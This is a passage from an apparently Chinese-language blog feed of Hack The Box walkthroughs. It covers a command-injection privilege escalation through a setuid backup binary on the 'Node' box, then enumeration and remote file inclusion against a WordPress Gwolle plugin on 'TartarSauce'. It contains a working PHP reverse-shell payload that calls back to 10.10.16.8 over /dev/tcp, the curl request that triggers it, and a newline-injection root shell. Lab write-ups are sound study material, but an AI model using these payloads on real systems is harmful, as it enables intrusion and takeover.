&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displayTarget&lt;/span>&lt;span class="p">((&lt;/span>&lt;span class="kt">char&lt;/span> &lt;span class="o">*&lt;/span>&lt;span class="p">)&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v11&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v4&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">getpid&lt;/span>&lt;span class="p">();&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v5&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">time&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v6&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">clock&lt;/span>&lt;span class="p">();&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v7&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">mix&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v6&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">v5&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">v4&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">srand&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v7&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v21&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">rand&lt;/span>&lt;span class="p">();&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">sprintf&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">name&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;/tmp/.backup_%i&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">v21&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">sprintf&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">command&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;/usr/bin/zip -r -P magicword %s %s &amp;gt; /dev/null&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">name&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">v11&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">system&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">command&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">access&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">name&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displayWarning&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;The target path doesn&amp;#39;t exist&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">else&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">sprintf&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">command&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;/usr/bin/base64 -w0 %s&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">name&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">system&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">command&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">remove&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">name&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">fclose&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">stream&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>通过代码了解到三个参数的作用如下：&lt;/p>
&lt;p>&lt;code>argv[1]&lt;/code> ，第一个参数如果是&lt;code>-q&lt;/code> 则不打印这个图案&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_o0daDtXtCp_huce494c2ce6986735346a1bb584c0c4dd_31912_9034d539f9a1822b13c27c8a6ee14c98.webp 400w,
/post/hackbox/node/image/image_o0daDtXtCp_huce494c2ce6986735346a1bb584c0c4dd_31912_78053edddc68d6434927e135a8653298.webp 760w,
/post/hackbox/node/image/image_o0daDtXtCp_huce494c2ce6986735346a1bb584c0c4dd_31912_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_o0daDtXtCp_huce494c2ce6986735346a1bb584c0c4dd_31912_9034d539f9a1822b13c27c8a6ee14c98.webp"
width="764"
height="483"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;code>argv[2]&lt;/code> ，第二个参数是认证作用，和&lt;code>/etc/myplace/keys&lt;/code> 文件匹配token，匹配正确才会往下执行。&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_uhGTkH9WYP_hu7dd975c647d8dedf7d7e4b5cb09a19dd_31628_8d6b25df1f508852ee7151a11928a004.webp 400w,
/post/hackbox/node/image/image_uhGTkH9WYP_hu7dd975c647d8dedf7d7e4b5cb09a19dd_31628_148ecaa87977ff33370fa249db5119cd.webp 760w,
/post/hackbox/node/image/image_uhGTkH9WYP_hu7dd975c647d8dedf7d7e4b5cb09a19dd_31628_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_uhGTkH9WYP_hu7dd975c647d8dedf7d7e4b5cb09a19dd_31628_8d6b25df1f508852ee7151a11928a004.webp"
width="491"
height="497"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里查看&lt;code>/etc/myplace/keys&lt;/code>，发现&lt;code>argv[2]&lt;/code>为空的话也可以匹配成功，因为&lt;code>/etc/myplace/keys&lt;/code>有一行是空&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_87qdkyurrI_hue4e63fa80ef6a3e33fd7cdcc094b9d04_15039_ca8b96d3a1a71aee30766d69f0cef5b6.webp 400w,
/post/hackbox/node/image/image_87qdkyurrI_hue4e63fa80ef6a3e33fd7cdcc094b9d04_15039_2430679bbde40c529b02a146320d765b.webp 760w,
/post/hackbox/node/image/image_87qdkyurrI_hue4e63fa80ef6a3e33fd7cdcc094b9d04_15039_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_87qdkyurrI_hue4e63fa80ef6a3e33fd7cdcc094b9d04_15039_ca8b96d3a1a71aee30766d69f0cef5b6.webp"
width="766"
height="111"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;code>argv[3]&lt;/code> ，第三个参数有校验值，不能包含&lt;code>..&lt;/code> &lt;code>/root&lt;/code> &lt;code> ; &amp;amp;&lt;/code> &lt;code>` &lt;/code> &lt;code>$&lt;/code> &lt;code>|&lt;/code> &lt;code>//&lt;/code> &lt;code>/&lt;/code> &lt;code>/etc&lt;/code> ，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_u8OpxI373X_hu3f0401f50533d4d1e582a3504c4b98d1_142562_66cbd055898ad8f2dda35b067654355c.webp 400w,
/post/hackbox/node/image/image_u8OpxI373X_hu3f0401f50533d4d1e582a3504c4b98d1_142562_caeec156f1473f761a7c38b11e66d4ca.webp 760w,
/post/hackbox/node/image/image_u8OpxI373X_hu3f0401f50533d4d1e582a3504c4b98d1_142562_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_u8OpxI373X_hu3f0401f50533d4d1e582a3504c4b98d1_142562_66cbd055898ad8f2dda35b067654355c.webp"
width="941"
height="622"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>然后&lt;code>argv[3]&lt;/code>拼接传入&lt;code>system()&lt;/code>执行命令&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_agHBdO0EVc_hu675c4433b775ae6653556adabbac8c06_13124_361c81a35e2b9a2bc74f42c5c049dede.webp 400w,
/post/hackbox/node/image/image_agHBdO0EVc_hu675c4433b775ae6653556adabbac8c06_13124_d3777dc4fa758126a4d0e671095647b6.webp 760w,
/post/hackbox/node/image/image_agHBdO0EVc_hu675c4433b775ae6653556adabbac8c06_13124_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_agHBdO0EVc_hu675c4433b775ae6653556adabbac8c06_13124_361c81a35e2b9a2bc74f42c5c049dede.webp"
width="616"
height="153"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;code>argv[3]&lt;/code>的参数校验防止了一些命令注入符号，但是遗漏了换行符 &lt;code>\n&lt;/code> ，并且&lt;code>/usr/local/bin/backup&lt;/code>属于admin组，拥有root权限，所以可以直接通过命令注入得到root权限。&lt;/p>
&lt;p>第三个参数先输入一个&lt;code>'&lt;/code>，然后通过enter 键获得换行符，再&lt;code>/bin/bash #'&lt;/code> 闭合单引号，即可执行获得&lt;code>root shell&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">tom@node:/$ /usr/local/bin/backup -q &lt;span class="s1">&amp;#39;&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">&amp;gt; /bin/bash #&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/node/image/image_2Cjj7uZVeP_hu317e73daebf6ac4240af5066b4c47d14_23264_6d483babd9d5c9483bbd35c0feb9a974.webp 400w,
/post/hackbox/node/image/image_2Cjj7uZVeP_hu317e73daebf6ac4240af5066b4c47d14_23264_efba8f706e6ba1b644e79067af1e7858.webp 760w,
/post/hackbox/node/image/image_2Cjj7uZVeP_hu317e73daebf6ac4240af5066b4c47d14_23264_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/node/image/image_2Cjj7uZVeP_hu317e73daebf6ac4240af5066b4c47d14_23264_6d483babd9d5c9483bbd35c0feb9a974.webp"
width="842"
height="260"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>TartarSauce</title><link>https://docs.kaiasec.tk/post/hackbox/tartarsauce/</link><pubDate>Mon, 18 Jul 2022 15:56:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/tartarsauce/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -p- -vv -sV 10.10.10.88
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>只开了80&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_F5sDtXbXB6_hu94eeccdd430c27ca922f23a4e3fe9e49_34861_26a3219b30da874466bdba99af7dfe08.webp 400w,
/post/hackbox/tartarsauce/image/image_F5sDtXbXB6_hu94eeccdd430c27ca922f23a4e3fe9e49_34861_58f6c31defa49fb3b74f2ed9093dfbfd.webp 760w,
/post/hackbox/tartarsauce/image/image_F5sDtXbXB6_hu94eeccdd430c27ca922f23a4e3fe9e49_34861_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_F5sDtXbXB6_hu94eeccdd430c27ca922f23a4e3fe9e49_34861_26a3219b30da874466bdba99af7dfe08.webp"
width="825"
height="86"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>扫描目录&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_FP3AtCpB5K_hu22a5b994a691ec52f0ee85a295676535_27406_8402880344a17330a183fb51dbb71f76.webp 400w,
/post/hackbox/tartarsauce/image/image_FP3AtCpB5K_hu22a5b994a691ec52f0ee85a295676535_27406_2149a0cbfe6eb22ac53f559dc5061c1f.webp 760w,
/post/hackbox/tartarsauce/image/image_FP3AtCpB5K_hu22a5b994a691ec52f0ee85a295676535_27406_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_FP3AtCpB5K_hu22a5b994a691ec52f0ee85a295676535_27406_8402880344a17330a183fb51dbb71f76.webp"
width="875"
height="256"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>10.10.10.88/webservices/wp/&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_J9_zn-GS6j_hu8cefd3b3d070ee028c64c86d32396f11_52301_e9aca10a666d1724d0a9eb262044e211.webp 400w,
/post/hackbox/tartarsauce/image/image_J9_zn-GS6j_hu8cefd3b3d070ee028c64c86d32396f11_52301_76cd0550d0e2342afd0b6c0bb7cf8878.webp 760w,
/post/hackbox/tartarsauce/image/image_J9_zn-GS6j_hu8cefd3b3d070ee028c64c86d32396f11_52301_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_J9_zn-GS6j_hu8cefd3b3d070ee028c64c86d32396f11_52301_e9aca10a666d1724d0a9eb262044e211.webp"
width="768"
height="432"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>可能是解析有问题，查看源码，发现域名&lt;code>tartarsauce.htb&lt;/code>，cms是&lt;code>WordPress 4.9.4&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_p3W4QKVnCh_hua6d5d6db353d70be0e9f0e3af4df8f2e_33578_5f73beaf155fa05957c1c5c865bf1900.webp 400w,
/post/hackbox/tartarsauce/image/image_p3W4QKVnCh_hua6d5d6db353d70be0e9f0e3af4df8f2e_33578_d551d9b8e0107a602f33113a0fd7469b.webp 760w,
/post/hackbox/tartarsauce/image/image_p3W4QKVnCh_hua6d5d6db353d70be0e9f0e3af4df8f2e_33578_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_p3W4QKVnCh_hua6d5d6db353d70be0e9f0e3af4df8f2e_33578_5f73beaf155fa05957c1c5c865bf1900.webp"
width="752"
height="133"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>添加hosts后解析正常&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_kZvh_-cuIF_hu830fe81efffec12d7fe3567e7435e36d_47219_296a5bb896b08e94920c11bfc8c47c8b.webp 400w,
/post/hackbox/tartarsauce/image/image_kZvh_-cuIF_hu830fe81efffec12d7fe3567e7435e36d_47219_b81c9ec1e7dddb841e635d47a24b9d58.webp 760w,
/post/hackbox/tartarsauce/image/image_kZvh_-cuIF_hu830fe81efffec12d7fe3567e7435e36d_47219_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_kZvh_-cuIF_hu830fe81efffec12d7fe3567e7435e36d_47219_296a5bb896b08e94920c11bfc8c47c8b.webp"
width="981"
height="531"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>使用wpscan扫描一下漏洞（kali自带）&lt;/p>
&lt;p>&lt;a href="https://github.com/wpscanteam/wpscan" target="_blank" rel="noopener">https://github.com/wpscanteam/wpscan&lt;/a>&lt;/p>
&lt;p>这里扫了很久，慢慢等把&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">wpscan --url http://10.10.10.88/webservices/wp --enumerate ap --detection-mode aggressive --plugins-detection aggressive --plugins-version-detection aggressive
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_lKUW_o3ZrH_hu740a4dcfdbc70797b369d7505a7a5521_193477_d4e6ad34ee6ef6ee1a39596645e40de7.webp 400w,
/post/hackbox/tartarsauce/image/image_lKUW_o3ZrH_hu740a4dcfdbc70797b369d7505a7a5521_193477_0e60d66eeef9779bf81b68cc70598fc6.webp 760w,
/post/hackbox/tartarsauce/image/image_lKUW_o3ZrH_hu740a4dcfdbc70797b369d7505a7a5521_193477_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_lKUW_o3ZrH_hu740a4dcfdbc70797b369d7505a7a5521_193477_d4e6ad34ee6ef6ee1a39596645e40de7.webp"
width="1277"
height="467"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>存在插件&lt;code>gwolle&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_bh7naLTzYA_hub581080a1c508e27d1c0c690fe643110_70630_10441e2974b8dfe048514e06ba2619f2.webp 400w,
/post/hackbox/tartarsauce/image/image_bh7naLTzYA_hub581080a1c508e27d1c0c690fe643110_70630_a7c9ebaeff3eefbb816095c304a4c43a.webp 760w,
/post/hackbox/tartarsauce/image/image_bh7naLTzYA_hub581080a1c508e27d1c0c690fe643110_70630_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_bh7naLTzYA_hub581080a1c508e27d1c0c690fe643110_70630_10441e2974b8dfe048514e06ba2619f2.webp"
width="1095"
height="226"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现&lt;code>gwolle&lt;/code> 存在远程文件包含RFI&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_UTRm2n0G___huaca8aea7efbe99fea8ed3d18770c6ce2_33470_37b7dd29ead8caa738617741fdcee05b.webp 400w,
/post/hackbox/tartarsauce/image/image_UTRm2n0G___huaca8aea7efbe99fea8ed3d18770c6ce2_33470_f76ea1625f57f3aca49ef32e1e206369.webp 760w,
/post/hackbox/tartarsauce/image/image_UTRm2n0G___huaca8aea7efbe99fea8ed3d18770c6ce2_33470_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_UTRm2n0G___huaca8aea7efbe99fea8ed3d18770c6ce2_33470_37b7dd29ead8caa738617741fdcee05b.webp"
width="894"
height="293"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;a href="https://www.exploit-db.com/exploits/38861" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/38861&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_svHAZADY3f_hu6cbc9f6cc53ce4c29fd741010199d03c_96396_34ada41189b13788f3bfaaeb9c62fb53.webp 400w,
/post/hackbox/tartarsauce/image/image_svHAZADY3f_hu6cbc9f6cc53ce4c29fd741010199d03c_96396_1dcf313364e43265b36e72a6ec625da1.webp 760w,
/post/hackbox/tartarsauce/image/image_svHAZADY3f_hu6cbc9f6cc53ce4c29fd741010199d03c_96396_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_svHAZADY3f_hu6cbc9f6cc53ce4c29fd741010199d03c_96396_34ada41189b13788f3bfaaeb9c62fb53.webp"
width="1612"
height="499"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>根据报告，只能远程文件包含&lt;code>wp-load.php&lt;/code> 文件，这个只要重命名一下就可以了。&lt;/p>
&lt;p>保存 wp-load.php，&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&amp;lt;?php
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;hack!!!&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> exec&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;bash -c &amp;#39;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.16.8/2333 0&amp;gt;&amp;amp;1&amp;#39;&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">?&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>本地起http服务 &lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python2 -m SimpleHTTPServer &lt;span class="m">80&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">curl 10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath&lt;span class="o">=&lt;/span>http://10.10.16.8/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>获得&lt;code>www shell&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_Pt6PnWH-Xz_hu4ca6518daa1d3d356715178e223ebbb9_100560_81a2f0fea8e749b40f21ed364c5cd384.webp 400w,
/post/hackbox/tartarsauce/image/image_Pt6PnWH-Xz_hu4ca6518daa1d3d356715178e223ebbb9_100560_d66ae713b7c2829fcf0359f318dad333.webp 760w,
/post/hackbox/tartarsauce/image/image_Pt6PnWH-Xz_hu4ca6518daa1d3d356715178e223ebbb9_100560_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_Pt6PnWH-Xz_hu4ca6518daa1d3d356715178e223ebbb9_100560_81a2f0fea8e749b40f21ed364c5cd384.webp"
width="708"
height="289"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;p>查看端口服务&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">netstat -tunlp
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_DXfsK82zv1_hu1060bea4f2b59b03a6fec5aacfe3953a_46875_1e780824711ac417b47fc01fe45295bb.webp 400w,
/post/hackbox/tartarsauce/image/image_DXfsK82zv1_hu1060bea4f2b59b03a6fec5aacfe3953a_46875_c207468f0b97c1723876e16b9eeb896a.webp 760w,
